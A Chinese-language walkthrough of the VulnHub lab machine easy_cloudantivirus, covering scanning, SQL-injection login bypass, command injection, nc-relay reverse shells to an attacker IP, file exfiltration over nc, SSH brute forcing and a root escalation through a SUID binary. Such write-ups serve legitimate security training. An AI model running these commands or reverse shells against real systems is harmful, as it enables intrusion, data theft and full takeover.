VulnHub靶机-easy_cloudantivirus 打靶

2024-04-13 02:28

本文主要是介绍VulnHub靶机-easy_cloudantivirus 打靶,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

easy_cloudantivirus 靶机

目录

  • easy_cloudantivirus 靶机
    • 一、导入虚拟机配置
    • 二、攻击方式
      • 主机发现
      • 端口扫描
      • web渗透-SQL注入
      • 命令注入
      • 反弹shell
      • ssh爆破
      • 提权

一、导入虚拟机配置

靶机地址:

https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/

下载完成,打开VirtualBox导入即可:

image-20240412201446313

二、攻击方式

主机发现

信息收集,使用nmap或者arp-scan进行扫描,发现主机

也可以循环执行 arping 命令

for i in  $(seq 1 254); do sudo arping  -c 2  10.1.2.$i; done

image-20240412195234561

端口扫描

nmap进行端口扫描,探针端口,服务信息

nmap -p- 10.1.2.126
nmap -sV -A 10.1.2.126

image-20240412195459338

探针发现,开发22和8080端口,可以使用hydra进行尝试ssh爆破,但是未果。

hydra -l root -P passwd.txt ssh://10.1.2.126

web渗透-SQL注入

发现还开放了8080端口,进行访问web界面,如下

image-20240412200652316

发现此网站为一个扫描器相关的网站,在交互处输入邀请码才可测试扫描,尝试注入测试

image-20240412200638100

输入数据不论数字还是字母,都给以下提示:

错误信息

image-20240412200957327

抓包,发现password参数,可进行注入,导入fuzzer字典,进行模糊测试

image-20240412201058846

选择并插入fuzzer的模糊测试字典,如下:

测试闭合方式,进行注入

image-20240412201221675

然后开始攻击,爆破即可,根据长度进行筛选,并发现状态码为200,页面变化:

万能钥匙

image-20240412201918175

得到payload测试输入,来到web界面,如下:

image-20240412201953388

然后我们随便输入一个以上提供的进行scan,观察页面变化,如选择第一个bash

等待扫描后如下:

image-20240412202758732

命令注入

根据以上,尝试命令注入,加入管道符跟上执行命令,看是否可回显

bash | ls

image-20240412203109338

页面成功回显,带出当前目录下的文件内容信息

反弹shell

尝试反弹shell,使用nc命令

image-20240412203248053

bash | nc 10.1.2.218 8888 -e /bin/bash

执行过后,发现无反应,没有反弹,可能此linux当中的nc不支持-e参数,采用nc串联的方式

bash | nc 10.1.2.218 6666 | /bin/bash | nc 10.1.2.218 8888

这里kali需要同时开启6666和8888端口,我们在6666端口输入的语句会在靶机中输入到bash环境中执行,再将执行的结果返回到kali的8888端口中。(这里针对nc没有-e参数还可以使用命名管道符进行反弹shell)

成功接收回显信息

image-20240412203949597

回显结果:

image-20240412204014879

ssh爆破

发现当前路径有database.sql文件,查看此文件类型,判断是何数据库文件

file database.sql

image-20240412204159892

此数据库文件为sqlite3,使用命令sqlite3查看一下,发现无此命令,那只能将其下载到本地,进行查看利用。

使用nc将文件传输到本地中,在本地进行内容的读取

kali:
nc -lvvp 5555 > database.sqlshell:
nc 10.1.2.218 5555 < database.sql

image-20240412210535124

成功下载到本地,通过sqlite3命令查看数据库内容

sqlite3
.open database.sql
.database
.dump

image-20240412210611604

得到四个密码信息:

myinvitecode123
mysecondinvitecode 
cloudavtech  
mostsecurescanner

查看靶机的/etc/passwd文件当中的用户信息,并查看有/bin/bash得账号

cat /etc/passwd | grep /bin/bash

拥有此权限的有以下三个用户:

image-20240412210912790

加上以上四个密码,尝试进行爆破,创建user.txt和passwd.txt,将以上的用户信息和密码填入,进行爆破,使用hydra爆破,但是未果

hydra -L user.txt -P passwd.txt ssh://10.1.2.126

image-20240412211449355

获取一个稳定shell,使用python

python -c "import pty;pty.spawn('/bin/bash')"

image-20240412211654113

image-20240412211618060

提权

查看有suid权限的文件信息:

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

image-20240412212310197

没有可利用的suid权限文件,查看/etc/passwd,只读权限,无法利用

image-20240412212421873

查看上一级目录有无利用文件

发现.c文件,并且已经编译好,恰好属主为root,那么利用一下,直接运行

image-20240412212459176

image-20240412212546968

提示我们缺省命令参数,那么我们加上命令再次运行,发现有log文件动用,尝试反弹shell

image-20240412212920294

查看此文件的源码:

image-20240412213728375

加上参数,尝试反弹shell

nc反弹shell,继续参与nc串联的方式

./updata_cloudav "1|nc 10.1.2.218 9999 | /bin/bash | nc 10.1.2.218 7777"

image-20240412213451265

成功接收,root权限

image-20240412213516669

image-20240412213530514

思路:

主机发现—>端口服务扫描—>开放22端口可爆破—>访问web服务—>SQL注入—>命令注入—>反弹shell,nc串联—>ssh爆破—>找提权点—>代码审计—>提权

文章不妥之处,欢迎批评指正!

这篇关于VulnHub靶机-easy_cloudantivirus 打靶的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/898900

相关文章

LibSVM学习(六)——easy.py和grid.py的使用

我们在“LibSVM学习(一)”中,讲到libSVM有一个tools文件夹,里面包含有四个python文件,是用来对参数优选的。其中,常用到的是easy.py和grid.py两个文件。其实,网上也有相应的说明,但很不系统,下面结合本人的经验,对使用方法做个说明。        这两个文件都要用python(可以在http://www.python.org上下载到,需要安装)和绘图工具gnup

打靶记录16——Momentum

靶机: https://download.vulnhub.com/momentum/Momentum.ova 下载后使用 VirtualBox 打开 难度:中 目标:取得 root 权限 + 2 Flag 攻击方法: 主机发现端口扫描信息收集Web 路径爆破XSS 漏洞JS 脚本分析AES 解密Redis 认证漏洞 主机发现 sudo arp-scan -l 端口扫描和服务发

11991 - Easy Problem from Rujia Liu?

题意: 输入一串整型数列,再输入两个数k,v,输出第k个v的序号。不存在则输出0,如第一个样例 8 41 3 2 2 4 3 2 11 3 //第1个3,序号为2,输出22 4 //第2个4,不存在,输出03 2 //第3个2,序号为7,输出74 2 思路: struct num {

【开发工具】开发过程中,怎么通过Easy JavaDoc快速生成注释。

文章目录 引言什么是Easy JavaDoc?Easy JavaDoc用来干什么?如何使用Easy JavaDoc?安装Easy JavaDoc配置Easy JavaDoc使用Easy JavaDoc生成注释 Easy JavaDoc与IDEA自带注释的区别IDEA自带注释Easy JavaDoc Easy JavaDoc的优缺点优点缺点 步骤 1:打开设置步骤 2:找到Easy JavaD

easy简化封装

//confirm function Confirm(msg, control) {$.messager.confirm('确认', msg, function (r) {if (r) {eval(control.toString().slice(11));}});return false;}//loadfunction Load() {$("<div class=\"datagrid-ma

Easy Voice Toolkit - 简易语音工具箱,一款强大的语音识别、转录、转换工具 本地一键整合包下载

Easy Voice Toolkit 是一个基于开源语音项目实现的简易语音工具箱,提供了包括语音模型训练在内的多种自动化音频工具,集成了GUI,无需配置,解压即用。 工具箱包括 audio-slicer、VoiceprintRecognition、whisper、SRT - to - CSV - and - audio - split、vits 和 GPT - SoVITS 等。这些优秀

tomato靶机通关攻略

主机发现  用kali去扫描端口,发现有3个开放端口 访问网站    在kali里面进行目录扫描,找到一个antibot_image   找到一个/antibot_image/ 目录,进而找到/antibots/目录  发现可能存在文件包含    页面通过image传参查看passwd文件  页面通过image传参查看日志文件   将一句话木马作为ssh登录的用户

.hackme靶机通关攻略

第一步查找ip 通过御剑扫描到IP进入尝试 成功找到靶场 步骤二来到这个靶场注册登录 进来点一下提交出来书名 只有一个框框那就来试试sql注入 1’ and 1=2 --+ 然后查看数据库 -1' union select database(),2,3 # 查看数据库表名 -1' union select group_concat(table_name),2,3

hackme靶机通关攻略

1、登录靶机,查询是否有注入点 2、判断闭合方式 输入OSINT' and 1=1 # 输入OSINT' and 1=2 # 得出闭合方式为单引号 2、查询数据库名 输入-1' union select database(),2,3 # 3、查询数据库中的表 输入-1' union select group_concat(table_name),2,3 from informa

Vulnhub靶场 | DC系列 - DC9

文章目录 DC-9环境搭建渗透测试端口敲门服务 DC-9 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀k